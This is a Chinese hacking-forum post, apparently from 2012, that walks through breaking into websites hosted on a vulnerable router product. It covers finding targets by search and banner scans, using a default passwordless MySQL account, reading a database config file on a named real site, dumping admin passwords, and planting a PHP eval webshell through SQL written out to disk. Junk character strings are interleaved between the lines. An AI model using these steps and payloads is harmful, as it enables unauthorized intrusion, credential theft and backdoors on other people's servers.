中国网络渗透测试联盟
标题:
利用某路由器漏洞入侵国外站点
[打印本页]
作者:
admin
时间:
2012-12-10 10:30
标题:
利用某路由器漏洞入侵国外站点
寻找存在漏洞的路由器方法:
! n4 j* V& P2 y3 y
1 Z0 J# W! q4 S# y; z7 V
1:google搜索'Raonet Subscriber Ethernet Router'
/ l- w6 |3 E6 C, Q( |) U
& b v% R5 ]9 Q5 e& g) B' X& |, m: ]
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
& P3 Z) A* d" u+ ?2 K
) X8 _' E. { V" x" p# H5 [# `0 W7 I
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
2 N8 K C4 U" R$ E2 J
, A3 O3 ^. V* l/ i [4 Y
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
& Y# _& Y8 R2 O* P R' X
e0 \. y8 W4 o) N8 M* k) Y
6 W" R8 \6 N# Z! Z* M3 s0 w$ ^/ ~4 c
- @; T6 v6 @% z' x, s; C9 I
入侵步骤:
& y; U) N. O2 T: s
8 d2 ^! H4 S9 |+ l" v
1.爆web路径,
http://www.yu1u.org/src/jpgraph_line.php
3 H- V. K3 i/ V% l' f. ~+ o, |+ g
* o6 Q+ @' \# t5 Q
2:查看数据库配置文件,
http://www.yu1u.org/inc/conn_db.inc
* Q' w) i% |% k& e4 {& g
3:得到密码后连接,查看GUI管理密码:
7 f! L7 {# Z ~% `/ I
use ser_500
! p' m5 _7 O; M
select id,passwd from user;
9 X8 t6 i: D2 Q4 F/ i$ P
4:通过数据库写入webshell,执行命令:
3 D' ^ e f5 C& @" N
use mysql;
" m# D: I+ \+ r, k3 s6 ^8 o
create table ok(cmd TEXT);
; V" \4 U! q3 v1 S
insert into ok values("<?php @eval($_POST[cmd])?>");
+ G5 Z5 o* e+ L6 s- m0 H
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
: s3 ~$ I6 w# y) s6 h0 A5 l
drop table ok;
1 }$ N- F( |+ t! m, y; ]/ m x1 Z
/ S8 P b, h8 s2 ]1 T0 ?7 F
5:连接后门shell.php
* \4 g/ P, w1 f3 P* K3 J. V. E
. d$ w' D3 U1 }1 A' E! k
6. 搞定!
B9 V7 v8 U5 z0 f
) z# ^/ C2 c- K2 O4 Q, {) S
作者:
Anthony~
时间:
2013-7-27 20:06
这个后果可以很严重的说
作者:
jos666
时间:
2013-7-29 12:07
不错哦,黑服务器补洞。。
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2